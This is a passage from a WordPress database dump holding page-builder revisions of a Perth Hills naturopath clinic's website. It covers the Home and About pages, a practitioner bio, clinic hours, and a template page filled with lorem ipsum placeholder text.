principles, utilising these to help us form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat; font-weight: normal;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat; font-weight: normal;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/1-01-crop.png\" title_text=\"1-01 crop\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"#ccd4c8\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" hover_enabled=\"0\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\"]<h3><span style=\"font-family: \'Playfair Display\'; \">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat; \">Tues/Wed/Thurs: 9am - 5pm</span><br /><span style=\"font-family: Montserrat; \">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-05-25 20:25:49','2021-05-25 12:25:49','',28,'https://verde.desidrivers.com.au/?p=139',0,'revision','',0),(153,1,'2021-05-25 21:35:10','2021-05-25 13:35:10','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Meet Mel.</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p>Mel is a mother, tea lover, avid foodie and degree-qualified naturopath. She resides amongst the trees in the Perth Hills. </p>\n<p>She has always held a passion for holistic health and wellbeing since a young age. Chronic hormonal imbalances and gut issues led her to her first naturopathy appointment where she gained a newfound respect for the profession after achieving success in returning to health. </p>\n<p>Mel is passionate about educating and empowering clients to achieve their health goals, working to restore balance between their mental, physical and emotional health. She has witnessed firsthand the healing power of herbs and nutrients, incorporating them into her own life as well as her client’s. Mel also runs Verde Botanicals, offering small-batch, handmade herbal remedies to keep her creative juices flowing. </p>\n<p> </p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/IMG_3973-scaled.jpg\" title_text=\"IMG_3973\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" make_equal=\"on\" _builder_version=\"4.9.4\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/IMG_3912-scaled.jpg\" title_text=\"IMG_3912\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p>Mel has a keen interest in women’s health, gut health, metabolic dysfunction, autoimmunity and mental health. She keeps up to date with the latest research and findings on all things naturopathy, blending traditional knowledge with evidence-based medicine to achieve positive health outcomes. When she’s not consulting or creating, you’ll most likely find her brewing a cuppa, chasing after her three children or wandering through the forest. </p>\n<p> </p>\n<p><strong>Qualifications</strong>: </p>\n<p>Bachelor of Health Science (Naturopathy) </p>\n<p>Bachelor of Science (Biological Science) </p>\n<p> </p>\n<p><strong>Professional memberships</strong>: </p>\n<p>Australian Natural Therapist’s Association (ANTA) - Full member</p>\n<ul></ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"#ccd4c8\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; \">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat; \">Tues/Wed/Thurs: 9am - 5pm</span><br /><span style=\"font-family: Montserrat; \">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','About Us','','inherit','closed','closed','','27-revision-v1','','','2021-05-25 21:35:10','2021-05-25 13:35:10','',27,'https://verde.desidrivers.com.au/?p=153',0,'revision','',0),(147,1,'2021-05-25 21:11:45','2021-05-25 13:11:45','[et_pb_section admin_label=\"section\"]\n [et_pb_row admin_label=\"row\"]\n [et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\"]<!-- wp:pagelayer/pl_post_props {\"post_title\":\"About Us\",\"post_name\":\"about\",\"post_status\":\"publish\",\"featured_image\":\"\",\"ele_bg_hover_delay\":\"400\",\"post_excerpt\":\"\",\"pagelayer-id\":\"mb61598\"} /-->\n<!-- wp:pagelayer/pl_row {\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"auto\",\"row_height\":\"custom\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#227bc3\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#e44993\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_bg_type\":\"image\",\"ele_bg_img\":\"12\",\"ele_bg_attachment\":\"scroll\",\"ele_bg_posx\":\"center\",\"ele_bg_posy\":\"center\",\"ele_bg_repeat\":\"no-repeat\",\"ele_bg_size\":\"cover\",\"min_height\":\"350px\",\"ele_margin\":\"-96px,0px,0px,0px\",\"ele_margin_tablet\":\"-125px,0px,0px,0px\",\"ele_margin_mobile\":\"-158px,0px,0px,0px\",\"min_height_mobile\":\"255px\",\"pagelayer-id\":\"msd3635\"} -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"pagelayer-id\":\"e6s2964\"} -->\n<!-- wp:pagelayer/pl_post_title {\"title_color\":\"#fafafaff\",\"typo\":\",35,,700,,,Solid,,Uppercase,,\",\"align\":\"left\",\"ele_margin\":\"11em,0em,0em,0em\",\"ele_margin_mobile\":\"10em,0em,0em,0em\",\"typo_mobile\":\",25,,,,,Solid,,,,\",\"pagelayer-id\":\"qvn9489\"} /-->\n<!-- /wp:pagelayer/pl_col -->\n<!-- /wp:pagelayer/pl_row -->\n<!-- wp:pagelayer/pl_row {\"stretch\":\"full\",\"col_gap\":\"0\",\"width_content\":\"full\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#fff\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#fff\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_bg_hover_delay\":\"400\",\"ele_padding\":\"5em,0em,0em,0em\",\"ele_padding_mobile\":\"2em,0em,0em,0em\",\"ele_padding_tablet\":\"3em,0em,0em,0em\",\"pagelayer-id\":\"ngm8752\"} -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"0\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"pagelayer-id\":\"ff83615\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"\\u003ch6\\u003eAbout\\u003c\\/h6\\u003e\",\"pagelayer-id\":\"d8n7169\"} --><h6>About</h6><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-4px,0px,0px,0px\",\"text\":\"\\u003ch5\\u003eAbout\\u003c\\/h5\\u003e\",\"pagelayer-id\":\"9ml5869\"} --><h5>About</h5><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-65px,0px,0px,0px\",\"ele_zindex\":\"-1\",\"heading_typo_mobile\":\",60,,,,,Solid,,,,\",\"text\":\"\\u003ch2\\u003eAbout\\u003c\\/h2\\u003e\",\"pagelayer-id\":\"f4d7469\"} --><h2>About</h2><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"1em,0em,2em,0em\",\"ele_padding_mobile\":\"1px,10px,1px,10px\",\"text\":\"\\u003cp style=\\u0022text-align: center\\u0022\\u003eNulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. \\u003cbr \\/\\u003eAmet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.\\u003cbr \\/\\u003e Nibh venenatis cras sed felis eget velit aliquet sagittis.\\u003c\\/p\\u003e\",\"ele_custom_pos\":\"true\",\"ele_align\":\"50%\",\"ele_height\":\"auto\",\"ele_custom_width\":\"650px\",\"pagelayer-id\":\"fvd5890\"} --><p style=\"text-align: center\">Nulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. <br />Amet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.<br /> Nibh venenatis cras sed felis eget velit aliquet sagittis.</p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_inner_row {\"stretch\":\"full\",\"col_gap\":\"0\",\"width_content\":\"full\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#227bc3\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#e44993\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"pagelayer-id\":\"lkd8577\"} -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"col\":\"6\",\"content_pos\":\"center\",\"ele_padding\":\"0px,50px,0px,60px\",\"ele_padding_tablet\":\"0px,10px,0px,10px\",\"ele_padding_mobile\":\"0px,10px,0px,10px\",\"pagelayer-id\":\"o2c2573\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-16px,0px,0px,0px\",\"text\":\"\\u003ch5\\u003ePaul Volkmer\\u003c\\/h5\\u003e\",\"pagelayer-id\":\"gsu3042\"} --><h5>Paul Volkmer</h5><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-44px,0px,0px,0px\",\"ele_zindex\":\"-1\",\"text\":\"\\u003ch3\\u003eOwner\\u003c\\/h3\\u003e\",\"pagelayer-id\":\"q4i9931\"} --><h3>Owner</h3><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"\\u003cp\\u003eDuis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. \\u003c\\/p\\u003e\",\"pagelayer-id\":\"p7d8782\"} --><p>Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. </p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"text\":\"\\u003cp\\u003e Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. \\u003c\\/p\\u003e\",\"pagelayer-id\":\"v1r1036\"} --><p> Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. </p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"text\":\"\\u003cp\\u003eLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. \\u003c\\/p\\u003e\",\"pagelayer-id\":\"d9t765\"} --><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. </p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"text\":\"\\u003cp\\u003e Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\\u003c\\/p\\u003e\",\"pagelayer-id\":\"bou1254\"} --><p> Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"text\":\"\\u003cp\\u003e Lorem ipsum dolor sit amet ectetur adipiscing elit. Nullam eget dolor sit amet sed diam nonummy nibh euismodor sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi beatae.\\u003c\\/p\\u003e\",\"pagelayer-id\":\"9wj610\"} --><p> Lorem ipsum dolor sit amet ectetur adipiscing elit. Nullam eget dolor sit amet sed diam nonummy nibh euismodor sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi beatae.</p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin_tablet\":\"0em,0em,2em,0em\",\"ele_padding_mobile\":\"0px,0px,35px,0px\",\"text\":\"\\u003cp\\u003eNullam eget dolor sit amet sed diam nonummy nibh euismodor sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi beatae.\\u003c\\/p\\u003e\",\"pagelayer-id\":\"vsv7069\"} --><p>Nullam eget dolor sit amet sed diam nonummy nibh euismodor sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi beatae.</p><!-- /wp:pagelayer/pl_text -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"6\",\"animation\":\"\",\"animation_delay\":\"600\",\"pagelayer-id\":\"lgw1958\"} -->\n<!-- wp:pagelayer/pl_image {\"id\":\"13\",\"id-size\":\"full\",\"align\":\"center\",\"img_hover\":\"normal\",\"img_hover_delay\":\"400\",\"caption_color\":\"#3E8EF7\",\"ele_bg_hover_delay\":\"400\",\"overlay\":\"true\",\"icon\":\"\",\"icon_color\":\"#eeaa6dff\",\"icon_size\":\"65\",\"overlay_bg_type\":\"color\",\"overlay_bg\":\"#0000001c\",\"content_position\":\"center\",\"show_always\":\"true\",\"link_type\":\"custom_url\",\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=WTagooKJMjE\",\"target\":\"true\",\"animation\":\"\",\"animation_delay\":\"700\",\"max-width_tablet\":\"100\",\"text\":\"\\n\",\"pagelayer-id\":\"3p187\"} -->\n<!-- /wp:pagelayer/pl_image -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- /wp:pagelayer/pl_inner_row -->\n<!-- /wp:pagelayer/pl_col -->\n<!-- /wp:pagelayer/pl_row -->\n<!-- wp:pagelayer/pl_row 